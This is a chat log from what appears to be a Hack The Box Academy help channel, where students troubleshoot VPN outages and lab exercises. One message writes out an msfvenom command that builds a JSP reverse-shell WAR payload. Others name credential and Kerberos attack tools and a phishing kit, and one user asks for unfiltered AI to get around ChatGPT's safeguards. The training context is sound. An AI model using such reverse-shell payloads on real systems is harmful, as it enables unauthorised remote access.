#modules

1 messages · Page 262 of 1

uneven oracle
#

Maybe yea.

cloud urchin
#

There is no "competitive VPN" on Academy. Academy is just the educational resource HTB provides, sounds like you're on the wrong VPN.

#

Try changing regions.

boreal crest
#

no no Im saying I can connect to the app.hackthebox competitive VPN and it works. On academy im trying the academy VPN and doesnt work. Ive tried changing regions too but no avail

cloud urchin
boreal crest
boreal crest
boreal crest
cloud urchin
#

so it's either your computer or htb. you can try changing regions to something totally different like usa/eu or reach out to official htb support for htb platform issues. I'm unfamiliar with wsl so I can't really comment on that, but I know a lot of people have problems with wsl instead of just using a traditional vm. another thing you can do is reset your entire network stack and reboot your computer and try again

#

netsh i i r r

#

netsh winsock reset

#

you'll need to run these commands in an elevated command prompt and it's going to wipe any custom static ip/dns settings in ncpa.cpl's adapters

uneven oracle
cloud urchin
#

that will rule out if it's your computer or the platform

#

don't forget to disconnect from the vpn if you use the pwnbox

dim wolf
uneven oracle
dim wolf
#

ah it's pwnbox issues

cloud urchin
#

then reach out to support

boreal crest
uneven oracle
boreal crest
#

I wrote to support lets see

dim wolf
blissful elm
uneven oracle
#

Guess I’m done for the night.
See how it acts tomorrow…

uneven oracle
boreal crest
#

I feel like this is a "connect from India issue"

blissful elm
#

i tried SG server

boreal crest
blissful elm
#

ok

dim wolf
#

at least for pwnbox

boreal crest
#

Even for VPN

blissful elm
#

so ovpn would be working right?

uneven oracle
boreal crest
#

Thats unfortunate. Well Ill wait an hour see what support says, keep yall updated

blissful elm
uneven oracle
blissful elm
#

starting a day with this error uff

uneven oracle
boreal crest
boreal crest
#

Okay so I can spawn a Pwnbox for UK region

#

so now on to VPN pack

uneven oracle
blissful elm
#

imagine the state of the server temp if it was in India

white ore
#

Hello Guys, I need some clarification

Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I try to follow this module with my own Host by using tunneling with ligolo-ng

All commands in the module work on my host with the tunneling setup except the psexec.py and raiseChild.py commands. As you can see in the figure, psexec.py works fine on academy host but not on my own host.

does anyone experience a similar scenario and issue and how do you resolve it ? Thank you!

blissful elm
#

name or service not known

#

try adding psexec.py file directory in path directory

tranquil axle
boreal crest
#

Okay guys so support kinda has no idea either sadglas

blissful elm
#

uk version is working 🔥

#

do you thing country high temp can affect server issue

twilit wharf
#

ADCS Attacks > Certifried > I can reproduce the attack up to the certipy auth command. Then its always a timeout. I have tried adding -dc-ip, -ns, -dns-tcp, setting a high value to -timeout and rebooting/resetting the lab box 3 or 4 times. Any ideas?

twilit wharf
boreal crest
blissful elm
cloud sinew
#

Anyone having trouble with the Windows Event Logs and Analyzing Evil course? Specifically the tapping into ETW module? It won't let me post the screen shot in here for some reason, but I can't navigate to \Tools\GhostPack Compiled Binaries in Powershell as an Administrator as it keeps saying that the "Compiled" argument cannot be used. I'm a noob at this, and I can't seem to find any fix online, and been struggling with this particular part of the last week. If anyone has any suggestions, I would appreciate it!

muted kindle
#

cd “C:\Program Files\”

cloud sinew
timber hatch
#

i am currently at the module windows priv escalation, i need a admin powershell, but i cannot type in a "@" when i get prompet for the password, is that right?

muted kindle
timber hatch
#

i think so...

untold moss
#

Is it just me or the VPN is not stable at all

#

I'm loosing connectivity every 2mn

timber hatch
#

i tested with a notepad...but i do not find the "@"

iron fog
untold moss
#

Can't do anything, have to reconnect openvpn every time

iron fog
#

I am unable to connect on any VPNs

bold sinew
#

Seems like an outage

muted kindle
untold moss
#

I'm able to connect and ping for maybe 1 or 2 minutes

#

but then it becomes unreachable

#

Loosing all revshells and progress

iron fog
untold moss
#

EU-Academy-2

#

Changing vpn seems to be the solution

tulip ether
#

Yup yup, my current work around as well..

clear tide
#

for me I am not even able to connect via VPN, ( though HTB lab VPN works fine)
I have tried eu2 , eu1, eu5, us1 ( TCP , UDP ) as well, and still no luck

tender nimbus
#

tahts my problem

slate zinc
#

hmm hey thier

#

so u got the repo wrong

#

it asks for password and username because its a private repo

#

@tender nimbus

#

is the repo private?
as in can u see the repo in github on icognito tab?

#

if it is private and you want to clone it then install github cli
and then run gh auth login

tender nimbus
#

You was right 🙂

slate zinc
tender nimbus
#

it was the wrong git ^^ thanks for you help and advice

sweet girder
#

Hi. Yup, I, again, have a problem. I tried to install Ubuntu for wsl2 on my windows vm, I checked the right option on Virtualbox to do a nested virtualization, but I still can't install Ubuntu. When I do systeminfo in the vm, it says : "An hypervisor has been detected, features of Hyper-V will not be displayed". I tried turning off hypervisor on the vm but it didn't work too

fiery berry
cloud urchin
#

ubuntu and wsl... oof

#

good luck

sweet girder
sweet girder
tender nimbus
#

sorry to border you again but do you know why i cant run the script here? Why should it be a zip?

#

Yeah when i want to launche the script i have this at info its about Pyphyser (educational purposes)

limber river
#

which script is this ?

tender nimbus
#

And i followed the same steps in the readme

#

yes

rustic sage
#

what module is this for?

tender nimbus
#

Its not for a module yesterday i was at Cybersec Europe 2024 and their was a lab where we used it so i was curious and i want to try it at home rn to see how this kind of stuff works

bold sinew
#

Module: Using Web Proxies > Burp Intruder

I have attempted to fuzz using the common.txt list on the target, the only things that show up as existing before the module times out is ||.hta, .htaccess and .htpasswd|| which are all 403 errors. I have looked in the source for all these pages for the flag, its not there. Im clearly doing something wrong if the module is timing out before I can find a html file. Any ideas?

silent barn
#

Since AI like ChatGPT likes to filter questions if they seem questionable, do you have any open source AI or other AI tools you use that are unfiltered

fiery berry
zealous rune
#

@tender nimbus which company demoed pyphisher

tender nimbus
zealous rune
#

are you belgian?

tender nimbus
#

Yupp

zealous rune
#

🙂

autumn pilot
#

keep the conversation in English

bold sinew
fiery berry
bold sinew
#

👍

zealous rune
#

i'm struggling with the end of module assignment for the module shells

#

Currently I am trying to exploit the first machine via the tomcat server

#

I have tried uploading a jsp reverse shell payload in war file format

#

the tomcat server seems to timeout when i upload the war file

vital tree
#

Hey all, is anyone facing any high latency on Academy lately 1000+ ms in their region for Pwnbox

zealous rune
#

and I don't understand why

#

I don't use pwnbox

fiery berry
zealous rune
#

well i do it from the machine that has the foothold

#

since the tomcat server is on an internal network

fiery berry
zealous rune
#

i can connect to the tomcat server

#

it's the upload that doesn't work

#

so clicking on the deploy button on the manager app the browser timesout

fiery berry
zealous rune
fathom pendant
#

Bro thay page looks scuffed I don't recall the page looking like that

#

Could be misremembering though

fiery berry
zealous rune
#

i'm using the links2 browser

#

it's txt based

fathom pendant
#

Well use firefox

#

Links2 looks gross

zealous rune
#

otherwise i can use firefox i suppose

#

🙂

fathom pendant
#

And at least eliminates the feeling of it being scuffed

zealous rune
#

maybe i will spin up a proxy and use firefox on my machine

fathom pendant
#

Brother

stray prairie
#

question for intro to malware static section, I placed the exe on the C:\Alpha\static but still no flag

fathom pendant
#

Firefox exists on the jump host

zealous rune
#

strange i don't see it

fathom pendant
#

Just type firefox in the terminal

zealous rune
#

let me check properly

#

which firefox returns

#

/usr/bin/firefox

fathom pendant
#

Again

zealous rune
#

doh

#

launced firefox

cerulean coyote
#

I am having trouble with HTB Academy module Password Attack - Pass the Ticket with Windows. I have connected to the target with RDP and opened a cmdline terminal. When I export the keys, I only get 2 keys for username MS01$, not any of the other users listed. I used Mnikatz and Rubeus and get the same results for both. What am I doing wrong? Need a hint.

fathom pendant
#

This probably eliminates half your issues

fathom pendant
#

Lsa != lsass

#

So they store different things

cerulean coyote
#

Will try that.

zealous rune
#

pretty much the same result as when i used Links2 and chromium via Burp

zealous rune
#

maybe i'm on the wrong page

#

that's the section of the page i am using to load the war file

fathom pendant
#

That looks correct

zealous rune
#

mmm i figure

#

I generated payload using msfvenom

#

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f war -o reverse_shell.war

obtuse galleon
#

I'm having trouble with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. I've tried getting GetUserSPNs.py to return the TGS for sapsso with both users wley and forend. TCPDUMP shows me reaching out to 172.16.5.238 and it not responding, eventually I get error 'Principal: FREIGHTLOGISTICS.LOCAL\sapsso - [Errno 104] Connection reset by peer'. Any hints for me?

fathom pendant
obtuse galleon
#

OK - which region do you suggest? I'm currently on US Academy 3.

fathom pendant
#

Wasn't talking to you really

#

But just try a different one

zealous rune
#

ok will give it a try thanks

cerulean coyote
#

Hey MarcieLee. Thanks for the hint, but the problem was that I was stupid. Didn't use the cmd terminal as admin the first time. Everything is fine now, and was able to export all keys.

fathom pendant
#

Well yeah

#

Most of the stuff required admin

slate zinc
icy umbra
#

GM ! , Im new in HTB, I got into the pen testing job path , i don’t use the pwnbox, I use my own VM , every section exercise HTB gave me a VPN file to download and exec on my VM but as I am moving forward with new sections and modules when I have to solve a exercise HTB doesn’t show me the option to download the VPN file , should I re download the old VPN files i downloaded before? Or I suppose to download a different VPN every different section / module ? Thanks in advance

next bronze
#

you'll only need to download it once

#

only reason to download again is if you're chaning vpn servers

icy umbra
inland sonnet
#

I am doing RDP to the Target Machine and this is what I get? Any suggestions what might me wrong?

zealous rune
#

which module is that?

inland sonnet
#

Its Windows Attack and Defense

zealous rune
#

hmmm i still get connectikon reset when trying to upload my war file payload to the tomcat server

#

ok, i've not done that one yet

inland sonnet
#

Other section's machines are working fine, this section tho :((((

zealous rune
#

but the message you get seems like the workstation you are attempting to logon from is not joined to the domain perhaps?

inland sonnet
fathom pendant
#

Try EU vpns

fathom pendant
zealous rune
#

perhaps it's then due to permissions

inland sonnet
#

ALright lemme try

zealous rune
#

yeah indeed

fathom pendant
#

The US vpns seem busted

zealous rune
#

i've tried a de vpn

frail star
#

Hiiii

fathom pendant
zealous rune
#

it's strange though cos fair enough if the vpn is busted

#

but i wouldn't expect problems between machines on the other side of the vpn

fathom pendant
#

There's EU-Academy-[1..5]

frail star
#

If i use kali linux instead of parrot is there any problem

dim wolf
#

nope

frail star
#

When playing machines

dim wolf
#

use whatever you like

fathom pendant
#

Vpn dictates the target spawn conditions

frail star
fathom pendant
#

Pwnbox region dictates pwnbox spawn conditions

fathom pendant
zealous rune
#

my bad

fathom pendant
#

As I've repeated this ad nauseum

frail star
#

Hmmm

fathom pendant
#

Pwnbox region != vpn region

zealous rune
#

yep

#

misclick

#

not paying attention

frail star
#

Did kali have everything to play machines

fathom pendant
#

I just tried with several us vpn servers btw @zealous rune they all time out; the EU one worked first try

zealous rune
#

ok thx

#

i'll b there in a sec

fathom pendant
dim wolf
zealous rune
#

thanks for testing that

fathom pendant
fathom pendant
#

Read and follow #welcome to gain access to more of the server

obtuse galleon
#

I just tried EU Academy 2 and the command I was trying worked. Both US Academy 3 and 4 are broken for this exercise.

fathom pendant
#

Us servers in general aren't working

#

:p

obtuse galleon
#

Would you suspect that the VPN is working but perhaps the VM environment is broken? Or you combine those two generally into VPN when you say that?

fathom pendant
#

At least for modules that may have internal networking

#

VPN dictates the target spawn conditions

#

If changing to EU fixed it; then something on the US VPN network is causing the VM to not spawn appropriately

vagrant osprey
#

is it recommended to use the pwnbox provided on the HTB website, or to vpn connect using a vm on your own computer?

fathom pendant
#

I generally only use the pwnbox to troubleshoot

#

I have more control over my own vm and tools

#

And I don't have to reinstall those tools every time I launch it

vagrant osprey
fathom pendant
fathom pendant
#

Once you set it up it's more of a convenience thing

vagrant osprey
fathom pendant
#

Also what are you on dial-up? 100Mbps caveman internet?

dim wolf
#

i think my vm is better than the pwnbox in every way

vagrant osprey
dim wolf
#

except for python

fathom pendant
fathom pendant
#

Especially depending on your carrier

obtuse galleon
#

Thanks MarcieLee - does a status.htba.com exist or something similar? Would be good to know to avoid something not working right.

dim wolf
#

the only thing the pwnbox has me beat in is having python 2.7

fathom pendant
fathom pendant
dim wolf
#

shit doesn't work when i build it!

#

i don't need python2 scripts anyway

fathom pendant
zealous rune
#

worked

obtuse galleon
zealous rune
#

thanks

dim wolf
#

never used a 2john script in my life

fathom pendant
zealous rune
#

furustrating, but that connection on the reverse shell listener makes it worthwhile!

dim wolf
#

fuck!

fathom pendant
#

:)

#

(Venvs are the way to go)

#

Or if you're brave enough, debug the script

#

To make it work with 3

vagrant osprey
#

halfway done with the download sadglas

#

blackarch looks cooler though ngl

fathom pendant
#

Blackarch is also 10x more work to set up

vagrant osprey
#

but... look cool

#

crow instincts

idle sigil
#

is there something up with the pwnbox instances? i keep getting this popup

fathom pendant
idle sigil
#

i did

#

but i keep getting the error

astral beacon
#

Since I had experience this issues yesterday

#

I get fixed by download the ovpn again

fathom pendant
#

Pwnbox region != vpn region

#

Downloading the ovpn would have no bearing on the pwnbox

idle sigil
fathom pendant
#

Yes

#

The SG server in this instance from your screenshot

idle sigil
#

I'm based in SG and ive never had issue with the latency wile using sg pwnboxes. but sometimes i do swap around the eu servers when the sg latency gets very high

fathom pendant
#

Yeah latency can be a factor with vpn+pwnbox

idle sigil
#

but tonight, i just have difficulty getting the pwnbox to start and/or getting rdp connection to the target via kali :/

fathom pendant
#

¯_(ツ)_/¯

#

I take it the target is meant to be rdped to

#

Also when you change the vpn region you have to respawn the target

idle sigil
#

yea it's this exercise

fathom pendant
#

Yes

idle sigil
#

ok i'll try that

fathom pendant
#

Again vpn region dictates target spawn

#

Your initial target spawned on your first vpn server

#

And if you don't reset it, it remains on that server

idle sigil
#

ok - retrying

bold sinew
#

How does one redirect traffic to ZAP? ZAP doesnt seem to have a built in browser like burpsuite.

fathom pendant
#

Proxy

#

I believe the proxies module goes over setting up burp and zap

bold sinew
#

getting this when I try, must be doing something wrong

fathom pendant
#

Is zap open when you have the proxy set?

bold sinew
#

yup, that it is

fathom pendant
#

Also are you using the extension "FoxyProxy"

bold sinew
#

I wonder if I can do the zap questions using burpsuite OMEGALUL

fathom pendant
#

Probably

bold sinew
#

and nope, am not

fathom pendant
#

They both do the same thing

shut quest
#

plugins like foxyproxy and switchyomega quickly let you set proxy settings fro your browser, or you can manually set them. From zap you can choose manual scan and launch a browser which will launch with the proxy already configured

fathom pendant
#

Zap just doesn't have the limits that Burp does

bold sinew
#

what one of these would I use to convert my payload to md5?

#

server is expecting an md5 of a username

#

(trying to fuzz to get a cookie)

#

nvm i just converted it to md5 manually

zealous rune
#

finished the shells module

#

thanks all for advices

#

thanks @fathom pendant for the shout to use a different vpn

#

had me stuck for a good while

mild flower
#

Yeah the vpn's seemed quitte buggy today

fathom pendant
#

the EU one worked first shot

zealous rune
#

yeah. it's actually quite a tricky little thing. Cos i never even thought the vpn could cause this issue, since the interactions were between machines on an internal network on the other side of the vpn

#

it wasn't even like i had crazy latency between my machine and the rdp foothold machine

foggy light
#

Module: Introduction to Windows Evasion Techniques
Missing tools folder?

fathom pendant
#

does the module state there's a tools folder?

flint linden
#

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

#

does anyone know how to find this

zealous rune
#

hmm i think this might have come up before

#

but I've just completed teh shells module and it doesn't show as completed in the Dashboard

limber surge
#

under cpts, PHP web shell

Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

i can upload the php file but when i redirect to the following path. /image/vendor/connect.php if show not found errror. can someone guide me. thnk

foggy light
#

reseted twice now

fathom pendant
#

try changing to EU vpn

#

otherwise chat support

fathom pendant
#

they also expect you to be ssh to the target

#

as per the first question instructions

bright coral
flint linden
fathom pendant
#

?

#

ssh [username]@[target_ip]

fathom pendant
#

then when it prompts to password you can just paste the password

#

[terminal you need to add shift to the paste shortcut]

fathom pendant
#

i believe the module/section tells you how to connect via ssh

flint linden
#

I am connected to the Htb ssh server

dim wolf
#

you messed up the error redirect

fathom pendant
#

^

#

put a space after the last character

#

2>/dev/null shouldn't have anything directly before it

flint linden
#

I did that but it’s not bringing out any error message or any output

fathom pendant
#

-size -28k

#

also

#

it's -name *.conf

#

it seems like either you copy/pasted wrong

#

or you changed things in the copy/paste without knowing

#

from what it looks like there's some missing info for it to grab what you're looking for

#

(note the error redirect also hides if it doesn't work)

iron ibex
#

Module: System Management
Section: Task Scheduling
Link of Section:
Description:
I don't understand what answer this question expects... 🤔

wide river
fathom pendant
#

you can see a lot about systemctl using man systemctl

narrow meadow
#

so i did this, its ok?

wide river
fathom pendant
#

we plebs can't

#

it's up to mods/admins/staff

#

and even if it's pinned no one reads that shit

#

so...

shut quest
#

would be nice is others did that, it really helps speed up replying to a question

wide river
#

ikr

fathom pendant
#

heck half the time people's questions have been answered via searching

fathom pendant
iron ibex
#

Actually I would have detailed the section/module for other questions.
But for this one I supposed that the question was precise enough for it to not being relevant

narrow meadow
#

ok

fathom pendant
#

don't do ctrl-C or anything

#

when you ctrl-C it cancels and doesn't provide any output

narrow meadow
#

its normally that its take a time?

fathom pendant
#

too many people just repeat the question and don't state what they have/haven't tried

fathom pendant
wide river
fathom pendant
#

i wouldn't advise just spinning up the pwnbox to do nmap scans

#

not to mention it can cause more issues if you don't terminate your vpn connection

narrow meadow
#

ok, but now i cant see the vs of the port 8080

candid lily
#

is vpn working for everyone?

shut quest
shut quest
candid lily
#

i did that

#

still it doesnt work

#

no tun0

shut quest
candid lily
#

it is working for others?

narrow meadow
#

and i asked" Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?"

candid lily
#

sudo nmap <ip> -sV -sC -p 8080 --min-rate 1000

shut quest
candid lily
#

there is something wrong with academy vpn it doesnt work

fresh plinth
candid lily
#

does vpn work for anyone?

old ivy
#

Please someone guide me

shut quest
# candid lily does vpn work for anyone?

Again yes VPN servers are working. I provided a troubleshooting guide from htb to help you out. Reach out to support if you are so set on it being on their end.

#

<@&861185840277487616>

candid lily
#

i tried running normal htb machines vpn and it works fine

old ivy
#

Oh sry my bad

old ivy
candid lily
#

i downloaded new vpn connection file and it doesnt work so i think from myside its fine

shut quest
#

Try a different server then

candid lily
#

i switched from eu to us

jolly cradle
narrow meadow
#

so i run nmap again and its still didnt work for me

shut quest
shut quest
candid lily
#

ok it works now

shut quest
narrow meadow
#

both🙃

shut quest
#

-p- tells nmap to scan all ports, default is top 1000, you can also do -p 22 to scan a specific port, I will let you read up on the other one 😉

narrow meadow
#

so i did this comman - nmap -sV -sc -p8080 ip

#

am i right?

#

and still

muted kindle
narrow meadow
#

from some reason

#

i cant see the version

limber river
candid lily
#

whats the point of silver anual subscription

#

montly billing for a year is 216 but annual is 490 how does it make sense

narrow meadow
candid lily
#

same with gold how come its 1260 its just scam lol

narrow meadow
haughty jetty
candid lily
#

what if i buy silver monthly and then cancel and buy again like this for 12 times

dim wolf
#

thats not how it works

#

your sub lasts for the month

#

so you can't just do that

candid lily
#

aw

#

it sucks tbh at that rate 1 module per month is so slow

haughty jetty
#

Well, that's the trade-off.
More money for instant access, or less money for a more "time gated" approach.

white ore
acoustic owl
#

The annual subscription also includes an exam voucher and the option to view a walkthrough

hard sail
rustic sage
fathom pendant
candid lily
#

i cant afford it anyways

acoustic owl
candid lily
#

hmm platinum seems a good option

stable bone
#

im still at 70 cubes 😭

rustic sage
fathom pendant
fathom pendant
rustic sage
#

Ooo,

narrow meadow
tender nimbus
fathom pendant
#

Likely the vpn, are you using a us academy vpn?

#

If so, switch to one of the EU ones

#

To do so; first ctrl-c on the vpn that's running

#

Then switch to one of the EU ones and download a new vpn

#

Note: you'll also have to respawn the target

#

It could also be that it's designed to be a 404

#

¯_(ツ)_/¯

#

Module context matters

fathom pendant
#

It helps others provide better troubleshooting than guess and check methods of troubleshooting

fierce mason
#

is the username for the attacking gitlab section in attacking common applications on the xato list in seclists

stable bone
fathom pendant
#

Sit down and do your work

#

If you want more cubes, buy them

#

You can't go + in cubes by just doing modules

#

Tier0 gives back 100%, tier 1+ gives back 20%

#

There's never a net gain

hexed lintel
#

i am stuck on this question

fathom pendant
#

I mean

hexed lintel
#

I found the keytab of user ||svc_workstations|| in crontab and used it to impersonate

fathom pendant
#

It kinda tells you what to do

#

||keytab extract||

#

There's a subsection regarding it

hexed lintel
#

||keytab extract|| gives me ||AES-256 HASH|| hash for user ||svc_workstations||
and i cannot find other keytab

fiery berry
fathom pendant
#

Use whatever wordlists the module primed you to use

hexed lintel
#

perfect hint

rustic sage
fathom pendant
#

I barely know English my guy

rustic sage
#

k

#

ur a ctf player right

fathom pendant
#

Lol no

rustic sage
#

wtf are you doing here then kek

fathom pendant
#

What module is this in relation to?

#

Cause I liked academy and joined

#

¯_(ツ)_/¯

rustic sage
#

ok can you review my add-on please

fathom pendant
#

No

#

As it has nothing to do with an academy module

rustic sage
#

i can't write on other channels

#

k thanks

narrow meadow
#

anyone help?

#

in Service Scanning

dim wolf
#

host unreachable, seems like the host isn't online

fathom pendant
#

^

#

Make sure you use the target ip, not the example

young flume
#

hey team can some one help me with password attacks module and Pass the ticket from linux section last question

slate zinc
young flume
#

“Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).”

fathom pendant
#

Well, did you find the ticket?

fathom pendant
#

What have you tried

young flume
#

no i can’t find the ticket

#

i ve tried all

#

stuck here 3 days

fathom pendant
#

Hint; use the tool showcased at the end of the section

#

It should reveal some nice keytab and ccache file locations

#

Also the full usernames for this section have been user@domain

young flume
fathom pendant
#

Only one or the other

#

If you use the ccache you don't need the keytab and vice versa

fierce mason
woven sinew
#

Hey! I was wondering if anyone could help me figure out how to read the contents of a text file with SMB. I am new to all this so if I need to supply more information let me know.

fathom pendant
#

Type

#

Or more

#

Spoiler

young flume
#

is this right cache?

fathom pendant
#

I'm not answering yes or no. Try using it and see

#

Try and fail before asking

#

Brother

#

Still a spoiler

#

As it contains the filename

fierce mason
fathom pendant
woven sinew
# fathom pendant Or more

This worked. Thank you so much! I was stuch here for a solid hour banging my head against a wall 🤣

woven sinew
fathom pendant
#

?

#

You just read it on your local system

#

You can exit

woven sinew
fathom pendant
#

Once you exit smb you'll see it

#

And you can read it there

woven sinew
#

😭

fathom pendant
#

I believe you can also do !cat filename from within smb (if you're on linux)

#

! Indicates to smb you want to run a command on your local system

woven sinew
fierce mason
shut quest
stable bone
#

u got this bro

#

(i cant help you ik nothing)

fair hearth
#

for the Mongod machine. how am I connect? bash: mongo: command not found

fathom pendant
#

This is a starting point machine yeah?

#

Also (install the tool)

fair hearth
#

I do not have access to this

#

I can not access the link you send me

acoustic owl
fair hearth
#

thanks

tacit stump
#

@errant siren i have the same problem too

#

i feel like there is an error getting the flag

#

i dont think people have even done that module here

fathom pendant
#

There are people that have

#

they just aren't active

#

you can also chill out

#

have you tried changing vpn regions and doing your enumeration again? I take it the module taught you basic enum tooling

dim wolf
#

that module is part of the bug bounty hunter path

#

also 0.3% @ 3.9k users is insane

cloud urchin
dim wolf
acoustic owl
#

The module describes a program with which you can enumerate a WP site. Use it

acoustic owl
errant siren
#

hacking WordPress Skill Assessment - Bullshit Module

acoustic owl
#

The program mentioned above shows you everything you need to know to find the flag

#

You don't need a shell to find the flag

dim wolf
#

what?

granite dove
#

Just dumped all my cubes to revisit the basics of EVERYTHING apparently the only good thing about my computer is showing me how much of an idiot I actually am.

Thank you technology...

fathom pendant
#

stares at my pc what are you hiding from me

summer lava
fathom pendant
#

Gz

slate zinc
tender nimbus
cloud urchin
fathom pendant
#

The error looks like it's expecting a file

#

But that's just a guess

west canopy
fathom pendant
#

Rocky fundamentals can lead to bad habits

buoyant void
#

Anyone have any tips for this Evil-WinRM error: Error:

An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired
Error: Exiting with code 1

I'm doing the Attacking Enterprise Network module and I've uninstalled and reinstalled the latest version of evil-winrm, ruby, etc. Tried a custom OpenSSL conf file and that's not helping either. I've tried accessing the necessary host via RDP but that's proving unsuccessful as well

Edit: Should add I'm on ParrotOS in case that's relevant

cloud urchin
#

looks like a timeout connecting to the target. i think evil-winrm has a timeout argument -t <seconds>, try a larger timeout window

buoyant void
#

Yeah I was looking for a timeout argument in the help output but there wasn't one. I tried it just now and it's an invalid option

#

I know xfreerdp has one which is helpful wish there was one for evil-winrm

fathom pendant
#

If you're running the US vpn, try EU

buoyant void
fathom pendant
#

I wrote to support a while ago regarding US vpns being terrible

buoyant void
fathom pendant
#

Again US vpn being shit has been brought up to the support team

#

So hopefully they fix it

#

last seen 7 hours ago
Was my chat with a support rep earlier today

earnest imp
#

yes I have a problem with the VPN too

granite dove
#

@west canopy @fathom pendant Thanks for the words of wisdom.

fathom pendant
#

I stumbled a bunch

#

and some of it was me just learning to just read the god damn question kek

granite dove
#

However, first of all, we have to fail. It is an unavoidable and essential part of learning. This is one of the parts of the learning process which make us successful. Experience is built on failures. It explains that we know how to handle different and sometimes adverse situations where something does not work as expected.

This was much needed lol

onyx halo
#

check the last line and the whole thing

fathom pendant
granite dove
#

This is the way

fathom pendant
#

Why did this command fail? Oh I missed the syntax --> fix

wanton idol
#

my guy that was about a month ago 😭

rustic sage
#

in nmap module in port scanning section, it says (i think) "if the filtered port scan takes long time, with syn scan(-sS), it means the port is unreachable due to other reason... then it sends a ICMP request to another filtered port as an example where the output is received fast, with an ICMP error code 3, indicating that the firewall on the port is rejecting the packet".
is the statement true, or i am not understanding something?

fathom pendant
#

it just depends

#

ICMP is weird like that (if it responds at all)

rustic sage
#

my understading is that, if its even a -sS option scan on filtered port, and it takes longer time, it's due to other reason, and if takes shorter time, it's due to firewall?

fathom pendant
#

you're thinking backwards

latent eagle
#

If you suspect a firewall, try -V5

fathom pendant
#

if you're scanning -sS directly on a filtered port that's different

west canopy
rustic sage
#

thanks

west canopy
#

filtered is just nmaps way of saying whatever packet we sent did not get any response from the server, period.

fathom pendant
#

under the ICMP error 3 (Host unreachable) there's several sub-errors as well

#

which may get sent back

west canopy
#

if a port is closed , it responds with RST

fathom pendant
#

the iana link i sent earlier contains all the ICMP errors

#

RFC 792 and RFC 1812 cover ICMP error code 3

west canopy
#

marcie you never cease to amaze me with your knowledge on these niche things

#

i think of ICMP as a ping pong ball

fathom pendant
#

I just used google

#

i remember reading up on them a while back ¯_(ツ)_/¯

dim wolf
#

mastered google-fu

fathom pendant
#

and who better to trust about a protocol than IANA

fathom pendant
#

if you're getting a reroute, it's ICMP error 5

cloud urchin
#

don't tell them we just google the answer or they'll start trying that first

fathom pendant
#

well error

#

code is more apt

latent eagle
#

ICMP is just traceroute, professional ping pong but with ores as ping pong paddles due to regulations of the sport

latent eagle
#

I mean, im surprised the default answer to peoples questions hasn't just become "Use ChatGPT bro"

fathom pendant
west canopy
#

i think linux traceroute uses UDP by default though?

rustic sage
fathom pendant
#

it depends

west canopy
#

it can do icmp and udp

#

and tcp i think?

latent eagle
fathom pendant
#

but i think most stuff now uses TCP/IP stack protocls

cloud urchin
fathom pendant
#

^

cloud urchin
#

i will be the first to say no one ever got anywhere alone, we have all learned from someone. where would humanity be without each other.

fathom pendant
#

he was more making fun of the fact that half of the time my answers are just "Googled it"

latent eagle
#

I dont make fun of people, I make people with fun

fathom pendant
#

ayo???

latent eagle
#

Don't sweat the petty things in life, pet the sweaty things

fathom pendant
#

AYOOO?????

latent eagle
#

Cybersecurity is just an expression of my ego

#

(HUGE)

#

Hope they announce the new CRTO competitor cert tomorrow

limber wasp
#

he man. Ive been experiencing the same thing for 3 days now. 3 nights ago i was able to login to the DNN portal download the .exe files nec. for priv esc. executed them and got a reverse shell as the NT Authority user on dev01. Got late and I shut it down thinking the persistance we had set up i could get right back with no problem. hahahaha yeah right. for 3 full days now, 3 new vms, anything and everything i could think of. Ive messaged support a couple of times. the login portal will load right up. But after entering creds it just times out. please tell me u found something....

buoyant void
limber wasp
#

I have done all that. so thats what you done, kept messing with it until u found a host that would let you log in?

limber wasp
latent eagle
#

Might be a good time to learn how to script your exploits

latent eagle
#

Looks like you are navigating to a file

#

Don't do that, navigate to the directory

#

Just go to /images/vendor

#

then ls

latent eagle
fathom pendant
fathom pendant
latent eagle
#

^ you don't sound ready for curl, your biceps are not ready

#

(not you marcie)

fathom pendant
#

you should be doing navigation from within the shell

#

this module is VERY MUCH step-by-step

#

I also take it you're referring to the "Shells and Payloads" module

#

as there's no "PHP shells" module

latent eagle
#

We love to see it

#

Impulse questioning

fathom pendant
#

¯_(ツ)_/¯

latent eagle
#

Blud dipped immediately too, yee haw 🤠

fathom pendant
#

for some other modules i can see some questioning

#

but this specific module is step-by-step

#

because the focus is on actually interacting with the shells

#

as each type of shell has their own ways

#

basic webshells being the ?var="system command"

latent eagle
#

The road to shell is paved with good intentions

fathom pendant
#

(and misconfigurations)

wanton idol
#

oh switch to a diff vpn server

fathom pendant
wanton idol
#

yeah i just saw when that was posted T-T

fathom pendant
#

It seems the US VPNs are having issues with targets that have any level of internal networks

wanton idol
#

it randomly went to a day before chat

fathom pendant
#

but discord is improving

#

US VPN seems fine for single hosted targets (at least afaik, haven't tested)

#

Messaged support earlier, they said they raised the issue and will get back when resolved

limber surge
latent eagle
#

I don't know if i'd say improving. There are far less people around in general, and to help with questions, and the mods still seem impossible to get help from

#

I've been trying to get my account verified for over 24 hrs now so I can use the other channels, and it seems I am being ignored

fathom pendant
wanton idol
#

dont u just need an account identifier thats found on your htb acc

fathom pendant
#

you do

latent eagle
#

Irregardless

#

Yes, I get an error

fathom pendant
#

but if it's linked to another account, it has to be first unlinked for you to link it again

wanton idol
#

ah i see

latent eagle
#

How do I unlink it? That account is deleted

fathom pendant
#

backend basically ticks a true/false flag

fathom pendant
wanton idol
#

support can

#

which u gonna have to wait lol

fathom pendant
#

support has nothing to do with the discord

latent eagle
#

That was my impression too

wanton idol
#

no not discord, htb

fathom pendant
latent eagle
#

This isa discord related issue

fathom pendant
wanton idol
#

ohh

latent eagle
#

I reached out to Nightwolf, he is busy

wanton idol
#

discord issue i thought it was htb issue

#

my b

fathom pendant
#

i mean we can see if @slender shoal can do something

latent eagle
#

Also reached out to him

fathom pendant
#

¯_(ツ)_/¯

latent eagle
#

Started with Tejas, thanks for the support though, marcie

fathom pendant
#

i haven't seen him do much of anything in the past like month

wanton idol
#

patience my child

fathom pendant
#

Yeah i would generally go with people who have the "mod" role

#

